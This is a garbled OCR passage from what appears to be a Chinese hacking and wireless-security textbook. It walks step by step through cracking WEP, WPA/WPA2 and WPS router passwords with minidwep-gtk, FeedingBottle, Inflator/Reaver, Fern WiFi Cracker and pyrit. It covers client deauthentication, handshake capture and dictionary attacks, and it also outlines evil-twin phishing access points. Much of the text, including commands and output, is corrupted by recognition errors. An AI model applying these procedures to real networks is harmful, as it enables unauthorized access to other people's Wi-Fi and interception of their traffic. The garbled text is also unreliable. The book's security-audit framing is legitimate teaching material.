[+] WPA PSK: “Password 

[+] AP SSID: 'Test-991 

[+] Nothing done, nothing to savej 


8.4 ”使 用 CDlinux 系 统 破解 无 
线路 由 器 密码 


CDlinux 系 统 中 自 带 有 许多 破解 工具 ， 
如 mimidwep-gtk、FeedingBottle、Inflator 
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等 ， 使 用 这 些 工 具 可 以 破解 无 线路 由 器 的 
密码 。 


8.4.1 使 用 minidwep-gtk 破 解 WEP 
密码 

使 用 minidwep-gtk 破 解 WEP 密 码 需要 以 
下 几 个 步骤 : 
Estee 回 双 去 CDlinux 桌 面 minidwep-gtk 图 标 ， 
如 下 图 所 示 。 


minidwep-gtk 
step 贺 启动 minidwep-gtk 首 先 会 弹出 一 个 警 
告 信息 框 ， 如 下 图 所 示 。 阅 读 完 警告 信息 
后 单 击 OK 按 钮 。 


本 软件 是 家 用 无 线路 由 器 安全 审计 之 工具 
切 勿 用 于 非法 行为 

盗用 他 人 无 线 网 络 涉嫌 违法 

委 弃 WEP 加 密 ， 使 用 WPA2 加 密 
关闭 路 由 WPS 


[Sor | 


下 图 为 启动 后 的 minidwep-gtk， 左 侧 
的 “无 线 网 卡 ” 中 可 以 看 到 接 入 的 无 线 网 
卡 ; “信道” 可 以 选择 对 那 种 信道 进行 打 
描 ，“ 加 密 方 式 ” 可 以 选择 针对 哪 种 加 密 方 
式 进行 破解 。 


天 上 网 二 站 NAC 。。 名 招 。 而 居 信 酒 ”操守 方式 PMAC 
wan0 ~ sam | 
now 

| 

i amzm | 
人 ~ 

加 有 | 
Ww | 
有 | se | 
加 110622-> 革 符 2 人 9 中 
a 上 | 

Eau | 
境 序 pin 机 
Ns 


人 @ 注 意 : 如 果 “ 无 线 网 卡 ” 中 没有 检测 到 
无 线 网 卡 ，minidwep-gtk 软 件 会 给 出 提示 ， 
此 时 可 以 检查 无 线 网 卡 是 否 插入 并 可 用 。 


step 贺 切换 加 密 方式 为 WEP 并 单 击 “ 扫 描 ” 
按钮 ， 扫 描 出 结果 后 会 给 出 详细 信息 ， 如 


WEP 


天 
pe 
Amepioyrg 3 
站 Anepermg 
Mepioyre 
DD ampioyrg 
Neplapre 7 

注入 过 于 
sm sl 


| M243-> 等 和 命中 


单 击 “ 启 动 ”按钮 ， 此 时 minidwep-gtk 
会 调用 aireplay-ng 打 断 客户 端 与 AP 之 间 的 连 
接 ， 抓 取 有 效 连接 信息 并 开始 重 放 数据 包 ， 
此 时 IVs 数 量 会 不 断 增加 ， 在 IVs 数 量 增加 的 
同时 minidwep-gtk 尝 试 进行 破解 密码 ， 如 下 
图 所 示 ， 玻 解 出 密码 后 会 给 出 提示 。 


无 网 二 


葬 南 NAC 


名 确 。 潮 居 信道“ 加 理 方 式 客户 钴 MAC 


ng 


Ri 
T27073070 raso0usb | 
py 


加 二 方式 
WEp -| 
ee 
Mreploy rg 2 
Mpbyrg 3 
(Nneploy ng 4 
Npiys 5 
Meply ne 
Mmeploy re 7 

诗人 过 
加 "| 


153922->Areplayng 之 -p 0841 威 帮 开始 注入 日 
1539:16-> 尼 动 Nreplayng 三 

153946- > 六 动 replayrng 了 

15:39:16-> 忆 haireplay ng -2p 0841 

1539:16- > 所 到 一 个 客户 钴 MACDC6DCDZ6TE<B 加 二 出 


TS 数量 76 


8.4.2 使 用 minidwep-gtk 破 解 WPA/ 
WPA2 密 码 


使 用 minidwep-gtk 破 解 WPA/WPA2 密 码 
需要 以 下 几 个 步 又 : 
启动 minidwep-gtk 并 将 加 密 方式 调整 为 
WPA/WPA2 方 式 并 启动 扫描 ， 如 下 图 所 示 。 


(0495E612CA21 ChinanetKTIKSF -62_ 11_ WPAZWPA_ wps 


747D2426E600 yw -62_10_WPA2 ee 
Acratataat22_pqzm_ -82_ 6_ VA 
EC2GCAAAABC2_TPUINK 43c2_-62_ 11_ WPAZWPA, 
- a ae La 
1a2sang7TDAC_hanshichtl A1 11 WeAMWeA -| 
ower 


1 24.21- > 等待 命 9 中 


排序 pn 码 
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step 图 选择 需要 破解 的 AP 单 击 “ 启 动 ” 按 
钮 ， 一 单 获取 到 握手 包 信 息 minidwep-gtk 会 
给 出 提示 ， 如 下 图 所 示 。 


局 inewep E30513.noe 


WW。 二 有 


NE 三 


wono |] Fagscpa35072 有 sa 轿 有 ae wp 四 
eT a 
NE eee 


ass 


已 到 入 WPA 扫 于 包 ， 先 泽 一 个 于 贷 提 中 码 呈 7 
MD Oo— 


ng LL 


加 Ar handshae PJM C FR EE OT IF OR ards ite ap 
182621->WPA 提 于 包 拉 | | 
182551->Wakt 30seronds for authentication handshake! 5 


8 出 | 
FT 


单 击 OK 按钮 ， 在 密码 选择 界面 中 选 
择 一 个 密码 ， 如 下 图 所 示 。 
人 


引 = 同 
Ee ame Em | 
sr mn a2 
CT ‘22 
Di CFASB OL2F08 pandshaie eap 1oaokB 1826 
Sespiem CA-68. O208 handshaie cap hecap 392 bytes 1826 
couNux CHAS8 O12F08 handshate cap wip 256n3 -i826 
bahgh27 介 bps i822 
lopesocketd Obyes i822 
nidwep ed S29 bytes 2010 和 202 
Serverauh SAU Ss2bytes 1822 
Ps 上 
Qone | 人 or | 


通过 字典 比 对 计算 出 WPA/WPA2 的 密 
码 ， 如 果 字 典 里 存在 密码 一 定 会 破解 出 来 ， 
破解 出 密码 后 会 给 出 提示 ， 如 下 图 所 示 。 


HEDS 


1Cpkeao2F08_Testaol_ -027_1_WPAWpA 
Fasacpaac073 目 当 图 日 、 127_5_wpazwpa 
Ceahasoeaen0 BU__56_13 WPAAWA_ 


Essid Testo0t 
Bssid TCFA68012F08 
WPA KEY: Password 


100238 >aeract ng 已 经 退出 


Ben 160nT1- ,已 记 ansircradkng 提 村 字 有 中 的 到 
0 Handshake fie for Hashcatrinm piC.FN.68.01.2F 8handshate cap hceal 
Handshake fle for EWEA/tmo/1C za.68.01.2E.08 handshatacapwto ||- 


8.4.3 使 用 minidwep-gtk 破 解 WPS 密 码 


使 用 minidwep-gtk 破 解 WPS 密 码 需 要 以 
下 几 个 步 又: 
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SEE 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


Estee 加 启动 minidwep-gtk 并 启动 扫描 ， 如 果 
是 破解 WPS 方 式 的 PIN 码 不 用 关心 加 密 方 
式 ， 在 扫描 出 的 AP 列表 中 ， 如 果 存 在 WPS 
在 其 尾部 会 进行 标注 ， 如 下 图 所 示 。 


minidwep-8tk-30513-fine Ee x] 
MAC 多 
F483CD336073 因 


到 悍 。 伟 下 ”加 杰 方 式 


名 医 日 _- 


wang 加 


| ao， 


排 所 pn 到 


VS 数量 :0 


step 图 选择 好 AP 后 单 击 Reaver 按 钮 ， 此 时 会 
弹出 一 个 Reaver 初 始 参数 列表 对 话 框 ， 如 下 
图 所 示 。 


EE 


哆 由 MAC 。。 名 和 。 强 座 。 信 衣 “加 中 方式 


pra 
Ex 
J pi 
wp rnpImndnen /iCFAGIN2 a mp 
BO]| 
at 
Npin 


NMR:6 


step 图 启动 Reaver 开 始 破解 PIN 码 ， 如 下 图 
所 示 。 


wlan0 monT 1C:FA:68:01:2F:08 
+ tee /tmp/ninidvep/1C:FA:68: 08.1og 


od 


Reaver v1,4 WiFi Protected Setup Attack Tool 
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffnerQtacnetso 
1.comy 


Truing pin 0 
Trying Pi 


4 
complete @ 2018-11-19 11:06:30 (8 seconds/pin) 
Trying pin 44445676 


寺 


8.4.4 使 用 FeedingBotle 工 具 破 解 
WEP 密 码 


使 用 FeedingBottle 破 解 WEP 密 码 可 以 使 
用 以 下 步骤 : 


[step 图 双击 FeedingBottle 图 标 启 动 软件 ， 如 
下 图 所 示 。 


eedingBottlel 


se 加 下 图 为 启动 后 
进入 下 一 步 。 


的 界面 。 单 击 Yes 按 钮 


一 一 


[step 图 在 无 线 网 卡 界 面 选择 无 线 网 卡 ， 如 下 
国 所 而。 单 击 Next 按 钮 进入 下 一 步 。 


FeedingBottie ai 


step 轩 AP 扫描 界面 选择 AP 加 密 方式 信道 等 
配置 项 ， 单 击 Scan 按 钮 启动 扫描 ， 如 下 图 
所 示 。 


Estee 图 选中 扫描 出 的 AP， 在 Clinets Information 
中 会 显示 出 接 入 AP 的 客户 端 信息 ， 如 下 图 
所 示 。 单 击 Next 按 钮 进入 下 一 步 。 


FeedingBottle 


Eee 图 破解 界面 有 4 种 方式 可 选 ， 这 里 同 
样 是 使 用 aireplay-ng 进 行 发 包 获 取 IVs 值 。 
如 果 没 有 获取 到 客户 端 握手 包 ， 可 以 单 击 
Deauth 按 钮 打 断 客户 端 与 AP 的 连接 ， 如 下 
图 所 示 ， 剩 下 的 时 间 等 待 足 够 多 的 IVs 后 破 
解 出 密码 。 


FeedingBottle 


8.4.5 ”使 用 FeedingBotle 工 具 破 解 
WPA/WPA2 密 码 
使 用 FeedingBottle 破 解 WPA/WPA2 密 码 
可 以 使 用 以 下 步 又: 
[sep 回 在 无 线 网 卡 界面 选择 无 线 网 卡 ， 如 下 
图 所 示 。 单 击 Next 按 钮 进入 下 一 步 。 


FeedingBottle 


[step 图 将 加 密 方式 切换 为 WPA/WPA2， 并 单 
击 Scan 按 钮 扫描 AP， 如 下 图 所 示 。 
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FeedingBottle 


step 图 选择 目标 AP 以 及 连接 AP 的 客户 端 ， 如 
下 图 所 示 。 单 击 Next 按 钮 进入 下 一 步 。 


FeedingBorile OX) 


step 园 在 破解 页 面 中 会 有 AP 的 信息 ， 以 及 
接 入 AP 客 户 端的 信息 ， 如 下 图 所 示 。 


FeedingBottle ~ 


step 园 单 击 Start 按 钮 ， 在 弹出 的 对 话 框 中 选 
择 一 个 字典 文件 ， 如 下 图 所 示 。 选 择 完成 
后 单 击 OK 按 钮 。 


Dictionary Flle Chooser 


Shous [a11 Files (* 习 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


通过 上 一 步 的 设置 ， 此 时 会 抓 取 握 手 
信息 ， 如 下 图 所 示 。 在 抓 包 过 程 中 需要 单 
击破 解 界面 中 的 Deauth 按 钮 。 


Step 


airodump-ng 


人 
CH II Elapsed; 24 5 ][ 2040-14-19 10:26 


PIR FAD Beacons Wlata, W/s [H Mp ENC ClPHER NIH E 


会 按照 字典 文件 开始 破解 ， 如 果 字 典 文件 
中 没有 密码 会 提示 更 换 字典 文件 ， 如 下 图 
所 示 。 


Passphraae not tn dictiorary! :( 
Use arother dictienary file? 


step 图 破解 出 密码 后 ， 下 方 WPA Key 会 给 出 
正确 的 密码 ， 如 下 图 所 示 。 


FeedingBottle 


Ranced Hode -| 


8.4.6 ”使 用 Inflator 工 具 破解 WPS 密 码 
使 用 Inflator 破 解 WPS 密 码 可 以 使 


以 


step 国 双击 Inflator 图 标 启 动 软件 ， 如 下 图 
所 示 。 


in 


step 图 启动 后 的 界面 如 下 图 所 示 ， 单 击 Yes 
按钮 。 


Inflator 1.0(for Reaver v1.4) 


step 图 从 网 卡 列表 中 选择 无 线 网 卡 ， 如 下 图 
所 示 。 单 击 Next 按 钮 进入 下 一 步 。 


IAflator 1.0(for Reaver V1.4) 


step 园 单 击 Scan for WPS enabled APs 按 钮 ， 
如 下 图 所 示 。 选 中 目标 AP， 单 击 Next 按 钮 
进入 下 一 步 。 


Tnflator 1.0(for Reaver v1.4) 


下 步骤 : 


[Sep 图 在 破解 WPS 界 面 中 ， 可 以 看 到 下 方 同 
样 是 使 用 Reaver 进 行 破解 ， 同 时 给 出 了 初始 
命令 ， 如 果 需 要 额外 添加 命令 可 以 勾 选 上 
方 给 出 的 参数 ， 如 下 图 所 示 。 


一 Inflator 1.0(for Reaver v1.4) 


Step 图 单 击 Run 按 钮 启动 Reaver 开 始 破 解 PIN 
码 ， 如 下 图 所 示 。 


Reaver 


人 


Reaver v1,4 WiFi Protected Setup Attack Tool 
Copyright. (c) 2011, Tactical Network Solutions, Craig Heffner <cheffneretacnetso 
1.com> 


[+] Uaiting for beacon from 1C:FA:68:01 
[1] WARNING: Failed to associate with 


[1] WARNING: Failed to associate uith 
[1!] iate with 

[!] iate with 1C: 

[| 5 :01:2F:08 (ES5 

[1] ed to associate with 1C:FA:68:01 
[1] WARNING: Falled to associate with 1C:FR:6 

| 由 Trying pin 12345670 


JE 


实战 演练 1 一 一 使 用 Fern WiFi Cracker 
破解 AP 密 码 

对 于 喜欢 图 形 化 界面 的 用 户 来 说 ， 这 
是 一 款 福利 工具 ， 在 使 用 该 工具 之 前 ， 建 
议 手动 关闭 那些 可 能 影响 程序 正常 运行 的 
进程 。 

使 用 Ferm WiFi Cracker 破 解 AP 密 码 的 操 
作 步 又 如 下 : 
[step 轩 | 选择 “应 用 程序 ”菜单 列表 下 的 “无 
线 攻击 ”菜单 ， 在 无 线 攻击 菜单 中 有 fern 
WiFi， 如 下 图 所 示 。 


8.5 


第 8 章 


Step 图 选择 fern WiFi 选 项 ， 可 以 打开 该 工 


具 ， 下 图 为 其 工作 界面 。 


Fern WIFICracker a@e 


Fem Wi Grocer ay 


barest pate t atready nctalled 


和 
keroatsbase 
| 


No key Entries 


step 贺 单 击 select Interface 右 侧 的 下 拉 按 钮 ， 
在 弹出 的 下 拉 列 表 中 选择 一 块 网 卡 ， 如 下 
图 所 示 。 


Bnet | 


[see 加 选择 完 网 卡 后 ， 会 弹出 一 个 提示 框 ， 
单 击 OK 按 钮 即 可 ， 如 下 图 所 示 。 


Tips - Scan settings © 


To Access the "Settings" for the network scan preferences "Double click" 


on any area of the main window, "Scan for network button" is used to 
scan for network based on the settings options of the settings dialog 


Default is automated scan, Fake Mac-Address is always used 


Don't show this message again 


| 


Estee 图 选择 完 网 卡 后 ， 单 击 下 方 的 “扫描 ” 
按钮 ， 开 始 扫 描 数 据 信息 ， 如 下 图 所 示 。 


wlanO ~ | 包 Refresh | 


Monitor Mode Enabled on wlanOmon 


《办 Scan for Access points 
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SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


step 国 扫描 过 程 中 ， 在 下 方 WEP 与 WPA 按 钮 
旁 ， 会 出 现 相应 的 数字 信息 ， 这 些 数 字 代 表 
搜索 的 AP 数 量 ， 如 下 图 所 示 。 


(» 


Active 


7 Detected 


(Wi WPA 


step 园 单 击 WPA 按 钮 ， 即 可 进入 扫描 到 的 
AP 页 面 ， 如 下 图 所 示 。 


( 仿 提 示 : 扫描 结果 页 面 大 致 分 为 以 下 几 个 
区 域 : 

(1) AP 列表 。 这 里 会 以 列表 的 形式 列 
出 已 经 扫描 出 的 AP， 如 下 图 所 示 。 


选中 AP 列表 中 的 AP 以 
如 下 图 


(2) 详细 数据 。 
后 ， 下 方 会 列 出 该 AP 的 详细 信息 ， 
所 示 。 


(3) 破解 选项 。 这 里 会 有 常规 破解 和 
WPS 方 式 破 解 两 个 选项 ， 如 下 图 所 示 。 


Attack Option 
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(4) 破解 进度 区 。 该 区 域 左 侧 显 示 破 解 
步骤 、 下 方 是 破解 进度 条 、 右 侧 有 选择 密码 
文件 按钮 以 及 客户 端 列 表 ， 如 下 图 所 示 。 


Ped Jame] 


[stp 图 选中 需要 破解 的 AP， 查 看 是 否 有 
客户 端 接 入 ， 然 后 选择 密码 文件 ， 单 击 
Browse 按 钮 ， 如 下 图 所 示 。 


password.lst 


[step 图 单 击破 解 Attack 按 钮 ， 这 时 按钮 的 文 
本 显示 会 换 成 Stop， 如 下 图 所 示 ， 如 果 需 要 
停止 破解 ， 可 以 单 击 Stop 按 钮 。 


此 时 程序 会 尝试 中 断 AP 与 客户 端的 
连接 ， 如 下 图 所 示 。 
Probing Access Point 


Deauthenticating DC:6D:CD:66:FE:CB 


step 柄 当 抓 取 到 关联 信息 后 ， 开 始 破解 ， 如 
下 图 所 示 。 而 且 抓 取 到 信息 文本 会 加 粗 颜 
色 并 变 成 黄色 来 显示 ， 没 有 抓 取 到 则 显示 
为 灰色 。 


Handshake Captured 


Bruteforcing WPA Encryption 


Finished 


step 图 破解 完成 后 会 提示 破解 出 的 密码 ， 如 
下 图 所 示 。 
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实战 演练 2 一 一 使 用 pyrit 工 具 破 解 AP 密 码 


pyrit 是 一 款 开源 且 完 全 免费 的 软件 ， 任 何人 都 可 以 检查 ， 复 制 或 修改 它 。 它 在 各 种 平 
台 上 编译 和 执行 ， 包 括 FreeBSD、MacOS X 和 Linux 作 为 操作 系统 以 及 x86、alpha、arm 等 
处 理 器 。 

使 用 pyrit 工 具 最 大 的 优点 ， 在 于 它 可 以 使 用 除 CPU 之 外 的 GPU 运算 加 速生 成 彩虹 表 ， 
本 身 支持 抓 包 获取 四 步 握手 过程， 无 须 使 用 airodump 抓 包 ， 如 果 已 经 通过 ariodump 抓 取 数 
据 ， 也 可 以 使 用 pyrit 进 行 读 取 。 

问题 : 什么 是 彩虹 表 ? 

答 : 彩虹 表 是 一 个 用 于 加 密 散 列 函数 逆 运 算 的 预先 计算 好 的 表 ， 为 破解 密码 的 散 列 值 
(或 称 哈 希 值 、 微 缩 图 、 摘 要 、 指 纹 、 哈 希 密 文 ) 而 准备 。 一 般 主流 的 彩虹 表 都 在 100GB 
以 上 。 这 样 的 表 常 常用 于 恢复 由 有 限 集 字符 组 成 的 固定 长 度 的 纯 文本 密码 。 

使 用 pyrit 命 令 ， 查 看 pyrit 工 具 的 帮助 信息 ， 如 下 图 所 示 。 

FaatakaUPYFIE 
et 
Usage: pyrit [options] command 

: Filters AccessPoint by ESSID 

: Print help for a certain command 

: Filename for input ('-' is stdin) 


-~-all-handshakes : Use all handshakes instead of the best one 
--aes : Use AES 


主要 参数 介绍 如 下 : 

-b: 按 BSSID 筛 选 AccessPoint。 

-e: 按 ESSID 过 滤 AccessPoint。 

-h: 打印 某 个 命令 的 帮助 。 

-i: 输入 的 文件 名 〈' - ' 是 stdin) 。 

: 输出 的 文件 名 〈' - ' 是 stdout) 。 

-r: pcap 格 式 的 数据 包 捕 获 源 。 

-u: 要 使 用 的 存储 系统 的 URL。 

--all-handshakes: 使 用 所 有 的 握手 ， 而 不 是 最 好 的 握手 。 
aes: 使 用 AES。 

pre 

e analyze: 分 析 数 据 包 捕获 文件 。 

attack_batch: 攻击 从 数据 库 的 PMKs /密码 握手 。 

attack_cowpatty: 攻击 一 个 来 自 cowpatty 文 件 的 PMK 握 手 。 

attack db: 攻击 与 数据 库 中 的 PMK 握 手 。 

attack_passthrough: 用 文件 中 的 密码 攻击 握手 。 

batch: 批 处 理 数据 库 。 

benchmark: 确定 可 用 内 核 的 性 能 

benchmark long: 更 长 和 更 准确 的 基准 版 本 。 

check db: 检查 数据 库 是 否 有 错误 。 


疡 4 了 


© © © © ©® © © © 
1 
© 
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create_essid: 创建 一 个 新 的 ESSID 。 
delete_essid: 从 数据 库 中 删除 一 个 ESSID 。 
eval: 计算 可 用 密码 和 匹配 结果 。 
export_cowpatty: 将 结果 导出 到 新 的 cowpatty 文 件 。 
export hashdb: 将 结果 导出 到 airolib 数 据 库 。 
export_passwords: 将 密码 导出 到 文件 。 
help: 打印 一 般 帮 助 。 
import_passwords: 从 类 文件 源 导入 密码 。 
import_unique passwords: 从 类 文件 源 导入 唯一 密码 。 
list_cores: 列 出 可 用 的 核心 。 
list_essids: 列 出 所 有 ESSID， 但 不 计 入 匹配 结果 。 
passthrough: 计算 PMK 并 将 结果 写 入 文件 。 
relay: 通过 RPC 中 继 一 个 存储 URL。 
selftest: 测试 硬件 以 确保 其 计算 正确 的 结果 。 
serve: 为 其 他 pyrit 客 户 提供 本 地 硬件 。 
strip: 将 数据 包 捕 获 文 件 剥 离 到 相关 数据 包 中 。 
stripLive: 捕获 来 自 现场 捕获 源 的 相关 数据 包 。 
verify: 通过 重新 计算 ， 验 证 结果 的 10% 。 

使 用 pyrit 进 行 破解 无 线路 由 器 密码 的 操作 步骤 如 下 : 
使 用 pyrit -r wlan0mon -o wpa.cap stripLive 命 令 ， 开 始 抓 取 数 据 包 ， 如 下 图 所 示 。 
root@kali:~# pyrit -Fr WUangmon -0 wpa.cap stripLive 
Pyrit 69.5.1 (C) 2698-2911 Lukas Lueg - 2915 John Mora 


https://github.com/JPaulMora/Pyrit 
This code is distributed under the GNU General Public License v3+ 


Parsing packets from 'wLangmon'... | 
1/1: New AccessPoint 59:2b:73:c4:72:56 (' 哇 味 味 ! 这 里 没 WiFi 哦 ! ') | 
2/2: New AccessPoint e4:68:a3:7d:37:92 ('CMCC-XJ') 

3/3: New AccessPoint f4:83:cd:33:69:73 (' 贺 | 


3/7: New Station 30:84:54:d6:ca:b9 (AP e4:68:a3:7d:37:92) 
4/8: New Accesspoint 94:88:5e:9a:1b:82 ('63ER06') 

5/12: New AccessPoint 86:83:cd:33:60:73 ('TPGuest 6073') 
6/17: New AccessPoint 1lc:fa:68:91:2f:698 ('Test-991') 
7/27: New AccessPoint e4:68:a3:7d:37:96 ('CMCC') 

8/29: New AccessPoint e4:68:a3:7d:37:91 ('and-Business') 
9/39: New AccessPoint e4:68:a3:7d:37:95 ('A') 


step 图 使 用 pyrit -r wpa.cap analyze 命 令 ， 对 抓 取 到 的 数据 包 进 行 分 析 ， 如 下 图 所 示 。 可 以 
看 到 ，Test-001 这 个 路 由 有 四 步 握手 的 过 程 。 


root@kali:~# pyrit -r wpa.cap analyze 

Pyrit 6.5.1 (C) 2998-26911 Lukas Lueg - 2615 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Public License v3+ 


Parsing file 'wpa.cap' (1/1)... 
Parsed 82 packets (82 892.11-packets)，got 41 AP(s) 
#24: AccessPoint lc:fa:68:91:2f:98 ('Test-991') : 
#1: Station dc:6d:cd:66:fe:cb, 2 handshake(s): 
#1: HMAC SHAl AES, good*, spread 1 
#2: HMAC SHAl AES, workable*, spread 25 
#25: AccessPoint e4:68:a3:7c:85:31 ('and-Business'): 


step 图 如 果 想 要 使 用 ariodump 抓 取 的 数据 包 ， 可 以 使 用 pyrit -r 001-01.cap -o pyritwpa.cap 
strip 命 令 ， 将 airodump 的 数据 包 做 一 个 格式 转换 ， 如 下 图 所 示 。 
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root@kali:-# pyrit -r 961-61.cap -0 pyritwpa.cap strip 

Pyrit 9.5.1 (C) 2998-2611 Lukas Lueg - 2915 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Public License v3+ 


Parsing file '991-91.cap' (1/1)... 
Parsed 53 packets (53 8962.11-packets), got 1 AP(s) 


#1: AccessPoint 1lc:fa:68:91:2f:698 ('Test-691') 
#0: Station dc:6d:cd:66:fe:cb, 1 handshake(s) 
#1: HMAC SHAl AES, good*, spread 1 


New pcap-file 'pyritwpa.cap' written (17 out of 53 packets) 


step 国 使 用 pyrit -r< 抓 取 的 数据 包 文 件 >-i< 密 码 文件 >-b<AP-MAC 地 址 > attack passthrough 命 
令 ， 开 始 破解 密码 ， 这 里 破解 出 的 密码 为 Password， 如 下 图 所 示 。 


-1 /usr/share/john/password. lst -b 1c:fa:68:01:2f:08 


ees :~# pyrit -r wpa.cap 
attack passthrough 

Pyrit 6.5.1 (C) 2998-2911 Lukas Lueg - 2915 John Mora 
https://github. com/JPaulMora/Pyrit 

IThis code is distributed under the 6NU General Public License v3+ 


lar file ‘wpa.cap’ (1/1)... 
Parsed 82 packets (82 802.11-packets), got 41 AP(5) 


ITried 647 PMKs so far; 718 PMKs per second. #!comnent: This list has been conpiled 
Py Sotar Designer of 0pe 


[The password is ‘password'. 


8.6 ”小 试 身手 


练习 1: 熟悉 aircrack-ng 工 具 套 件 。 

练习 2: 使 用 aircrack-ng 破 解 WEP、WPA 以 及 WPS 密 码 。 
练习 3: 使 用 图 形 化 工具 破解 WEP 密 码 。 

练习 4: 使 用 CDlinux 系 统 工具 破解 无 线路 由 器 密码 。 
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通过 扫描 探测 可 以 发 现 附近 AP 信息 ， 通 过 这 些 AP 信 息 可 以 虚拟 出 一 个 与 AP 信息 完全 
相同 的 AP， 这 样 做 可 以 实现 信息 过 滤 ， 也 能 在 一 定 程度 上 起 到 保护 AP 的 作用 。 


9.1 虚拟 AP 技术 


虚拟 AP 技术 相当 于 使 用 计算 机 设备 
通过 软件 模拟 AP， 通 过 计算 机 可 以 设置 
DHCP 服 务 器 ， 接 入 AP 的 网 络 设备 通过 计 
算 机 共享 上 网 。 


对 灌 光 9.1.1 认识 虚拟 AP 技术 


虚拟 AP 技术 从 Windows 7 操作 系统 开始 
就 存在 了 。 要 想 实现 虚拟 AP， 需 要 用 户 的 
计算 机 准备 两 块 网 卡 ， 一 块 有 线 网 卡 ， 一 
块 无 线 网 卡 ， 其 中 ， 有 线 网 卡 用 来 上 网 ， 
无 线 网 卡 用 来 发 射 信号 。 这 样 一 旦 有 设备 
接 入 虚拟 AP， 就 可 以 通过 抓 包 的 方式 来 查 
看 该 设备 的 网 络 通信 数据 了 。 

虚拟 AP 技术 主要 是 用 来 网 络 共享 的 ， 
如 果 当 前 只 能 一 台 计 算 机 上 网 ， 这 个 方 
法 可 以 实现 不 同 设备 共享 计算 机 的 有 线 网 
络 ， 但 同时 也 可 能 成 为 黑客 恶意 攻击 的 一 
种 方法 。 当 然 随 着 无 线 网 的 发 展 ， 虚 拟 AP 
已 经 由 主要 的 网 络 共享 转变 为 多 种 功能 ， 
例如 通过 接 入 虚拟 AP 来 抓 取 网 络 数据 包 ， 
对 于 网 络 分 析 是 非常 有 帮助 的 。 

除 Windows 系 统 可 以 虚拟 AP 外 ，Kali 
Linux 系 统 同 样 也 可 以 虚拟 AP， 并 且 通 过 
Kali Linux 系 统 还 可 以 完全 模拟 AP 的 整个 转 


渴 9.1.2 ”防范 虚拟 AP 的 钓鱼 攻击 


伪 AP 钓 鱼 攻击 ， 是 通过 仿照 正常 的 
AP， 搭 建 一 个 伪 AP， 然 后 通过 对 合法 AP 进 
行 拒绝 服务 攻击 或 者 提供 比 合法 AP 更 强 的 


信号 ， 迫 使 无 线 客户 端 连接 到 伪 AP， 这 是 
因为 无 线 客户 端 通常 会 选择 信号 比较 强 或 
者 信 噪 比 (SNR) 低 的 AP 进行 连接 。 

为 了 使 客户 端 连接 达到 无 颖 切换 的 效 
果 ， 伪 AP 应 该 以 桥接 方式 连接 到 另外 一 个 
网 络 。 如 果 成 功 进 行 了 攻击 ， 则 会 完全 控制 
无 线 客户 端 网 络 连接 ， 并 且 可 以 发 起 任何 进 
一 步 的 攻击 。 发 起 无 线 钓鱼 攻击 的 黑客 一 般 
会 采取 以 下 步骤 来 最 终 控制 终端 设备 。 


1. 获取 无 线 网 络 的 密 钥 


对 于 采用 WEP 或 WPA 认 证 的 无 线 网 
络 ， 黑 客 可 以 通过 无 线 破解 工具 ， 或 者 采用 
社会 工程 的 方法 ， 来 窃取 目标 无 线 网 络 的 密 
钥 ， 对 于 未 加 密 的 无 线 网 络 则 可 以 省 略 这 一 
步骤， 使 得 无 线 钓 鱼 攻击 更 容易 得 手 。 


2. 伪造 目标 无 线 网 络 


用 户 终端 在 接 入 一 个 无 线 网 络 之 前 ， 
系统 会 自动 扫描 周围 环境 中 是 否 存在 曾 
经 连接 过 的 无 线 网 络 。 当 存在 这 样 的 网 
络 时 ， 系 统 会 自动 连接 该 无 线 网 络 ， 并 自 
动 完成 认证 过 程 ， 当 周围 都 是 陌生 的 网 络 
时 ， 需 要 用 户 手工 选择 一 个 无 线 网 络 ， 并 
输入 该 网 络 的 密 钥 ， 完 成 认证 过 程 。 

黑客 在 伪造 该 无 线 网 络 时 ， 在 目标 无 
线 网 络 附近 架设 一 台 相 同 或 近似 SSID 的 
AP， 并 设置 之 前 窃取 的 无 线 网 络 密 钥 ， 这 
台 伪 AP 一 般 会 设置 成 可 以 桥接 的 软 AP， 
此 更 加 隐蔽 ， 不 容易 被 人 发 现 ， 这 样 ， 黑 
客 伪造 AP 的 工作 就 完成 了 。 

由 于 伪造 的 AP 采用 了 相同 的 SSID 和 


网 络 密 铀 ， 对 用 户 来 说 基本 上 很 难 进行 
辨别 ， 并 且 由 于 伪造 AP 使 用 了 高 增益 天 
线 ， 附 近 的 用 户 终端 会 接收 到 较 强 的 无 线 
信号 ， 此 时 在 用 户 终端 上 的 无 线 网 络 列表 
中 ， 这 个 伪造 的 AP 要 优 于 正常 AP 排 在 靠 前 
的 位 置 。 这 样 ， 用 户 就 很 容易 上 当 ， 掉 入 
这 个 被 精心 构造 的 陷阱 中 。 


3. 干扰 合法 无 线 网 络 


对 于 那些 没有 自动 上 钧 的 移动 终端 ， 
为 了 使 其 主动 走 进 布 好 的 陷阱 ， 黑 客 会 对 
附近 合法 的 网 络 发 起 无 线 攻 击 ， 使 得 这 些 
无 线 网 络 处 于 准 痪 状态 。 这 时 ， 移 动 终端 
会 发 现 原 有 无 线 网 络 不 可 用 ， 重 新 扫描 无 
线 网 络 ， 并 主动 连接 附近 无 线 网 络 中 信号 
强度 最 好 的 AP。 

由 于 其 他 AP 都 不 可 用 ， 并 且 黑 客 伪 
造 的 钓鱼 AP 信号 强度 又 比较 高 ， 移 动 终端 
会 主动 与 伪造 的 AP 建立 连接 ， 并 获取 IP 地 
址 。 至 此 ， 无 线 钓鱼 的 过 程 就 完成 了 。 


4. 截获 流量 或 发 起 进一步 攻击 


无 线 钓鱼 攻击 完成 后 ， 移 动 终 端 就 与 
黑客 的 攻击 系统 建立 了 连接 ， 由 于 黑客 采 
用 了 具有 桥接 功能 的 软 AP， 可 以 将 移动 终 
端的 流量 转发 至 Internet， 因 此 移动 终端 仍 
能 继续 上 网 ， 但 此 时 ， 所 有 数据 已 经 被 黑 
客 尽 收 眼 底 。 

黑客 会 捕获 这 些 数据 并 进一步 处 理 ， 
如 果 使 用 中 间 人 攻击 工具 ， 甚 至 可 以 截获 
采用 了 SSL 加 密 的 g-mail 邮 箱 信息 ， 而 那些 
未 加 密 的 信息 更 是 一 览 无 余 。 

